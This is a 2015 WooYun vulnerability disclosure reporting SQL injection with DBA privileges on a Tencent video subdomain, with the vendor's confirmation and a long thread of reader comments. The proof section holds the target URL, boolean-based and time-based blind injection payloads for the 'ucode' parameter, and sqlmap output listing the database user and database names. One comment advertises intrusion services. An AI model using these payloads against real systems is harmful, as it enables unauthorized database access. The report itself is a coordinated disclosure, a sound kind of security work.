当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163306

漏洞标题:腾讯某分站SQL注入DBA权限

相关厂商:腾讯

漏洞作者: 紫霞仙子

提交时间:2015-12-21 21:29

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

腾讯某分站SQL注射

详细说明:

http://ticketapi.video.qq.com/get_bonus?otype=json&callback=jQuery19102120662210509181_1450691532464&low_login=1&c_id=1&ucode=asd&c_from=1&g_tk=932252050&_=1450691532477

漏洞证明:

---
Parameter: ucode (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: otype=json&callback=jQuery19102120662210509181_1450691532464&low_login=1&c_id=1&ucode=-5562' OR 5712=5712 AND 'qIqO'='qIqO&c_from=1&g_tk=932252050&_=1450691532477
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: otype=json&callback=jQuery19102120662210509181_1450691532464&low_login=1&c_id=1&ucode=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))yOGi) AND 'WuPe'='WuPe&c_from=1&g_tk=932252050&_=1450691532477
---
[21:05:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:05:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[21:05:54] [INFO] fetching current user
[21:05:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:05:54] [INFO] retrieved: vplus_ivan@%
current user:    'vplus_ivan@%'
[21:06:05] [INFO] testing if current user is DBA
[21:06:05] [INFO] fetching current user
current user is DBA:    True
available databases [13]:
[*] d_movie_discount
[*] information_schema
[*] mysql
[*] ogc_ad
[*] oss_inner
[*] oss_result
[*] template
[*] test
[*] vplus_ad_income
[*] vplus_contact_info
[*] vplus_ivan
[*] vplus_maxy
[*] watch_cinema

修复方案:

~~~求送 QQ公仔!!!

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-22 10:29

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-22 10:38 | 小人物Reno ( 普通白帽子 | Rank:477 漏洞数:114 | X)

    6666666666

  2. 2015-12-22 10:47 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    mark

  3. 2015-12-22 10:58 | 沦沦 ( 普通白帽子 | Rank:611 漏洞数:141 | 爱老婆,爱生活)

    给力

  4. 2015-12-22 11:02 | Ton7BrEak ( 普通白帽子 | Rank:245 漏洞数:50 | 吃苦耐劳,我只会第一个!)

    mark

  5. 2015-12-22 11:08 | 随缘 ( 路人 | Rank:6 漏洞数:2 | 宁缺毋滥。)

    占沙发打广告

  6. 2015-12-22 11:16 | LMva ( 路人 | Rank:2 漏洞数:1 | 爱生活 | 爱老婆)

    666

  7. 2015-12-22 11:32 | 猴子搬来的救兵 ( 路人 | 还没有发布任何漏洞 | 专注于Android平台漏洞发现)

    仙子爆个照把

  8. 2015-12-22 11:41 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    @猴子搬来的救兵 @雷锋网 /尴尬

  9. 2015-12-22 11:54 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2884 漏洞数:501 | 刚发现个好洞网站就挂了)

    @紫霞仙子 仙子怎么升V,上众测提高危么

  10. 2015-12-22 12:07 | 58同城(乌云厂商)

    仙子长得很帅的,男的看了想搞基,女的看了想变成男的和他搞基

  11. 2015-12-22 12:14 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    @58同城 没节操啊啊啊啊!!!

  12. 2015-12-22 12:27 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河 为你放弃世界有何不可)

    @紫霞仙子 @58同城 真6 目测58同城早已看过

  13. 2015-12-22 12:30 | 沦沦 ( 普通白帽子 | Rank:611 漏洞数:141 | 爱老婆,爱生活)

    仙子很帅很萌的

  14. 2015-12-22 13:19 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    - -

  15. 2015-12-22 14:01 | 安全小飞侠 ( 实习白帽子 | Rank:82 漏洞数:16 | 安全小飞侠就是我,我就是安全小飞侠!)

    仙子很帅很萌的

  16. 2015-12-22 14:11 | prolog ( 普通白帽子 | Rank:587 漏洞数:112 | Rank:8888 漏洞数:1024 | 低调求发展)

    出售仙子exp,包夜,带价短消息

  17. 2015-12-22 14:17 | ago ( 普通白帽子 | Rank:544 漏洞数:93 )

    仙子狠羞涩

  18. 2015-12-22 15:02 | boooooom 认证白帽子 ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)

    注入小王子

  19. 2015-12-22 15:15 | Mark0smith ( 普通白帽子 | Rank:105 漏洞数:41 )

    Cool

  20. 2015-12-22 15:29 | ’‘Nome ( 实习白帽子 | Rank:63 漏洞数:21 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    谢谢

  21. 2015-12-22 16:29 | webshell ( 实习白帽子 | Rank:62 漏洞数:19 | hello word.)

    66666666666666666

  22. 2015-12-22 16:44 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    6666妹子搞注入,不好意思我想歪了

  23. 2015-12-22 17:48 | daniulaiba ( 路人 | Rank:2 漏洞数:1 | 渗透,提权技术可以联系我kkjk.net带你发财...)

    很厉害

  24. 2015-12-22 19:56 | Aasron ( 普通白帽子 | Rank:208 漏洞数:57 | 工欲善其事,必先利其器)

    @紫霞仙子 我是至尊宝,来一达注入给我

  25. 2015-12-22 22:14 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    666

  26. 2016-02-05 10:53 | 90Snake ( 普通白帽子 | Rank:146 漏洞数:49 | 人如果没有梦想,跟咸鱼有什么分别)

    这都是咋扫的 真牛逼。。。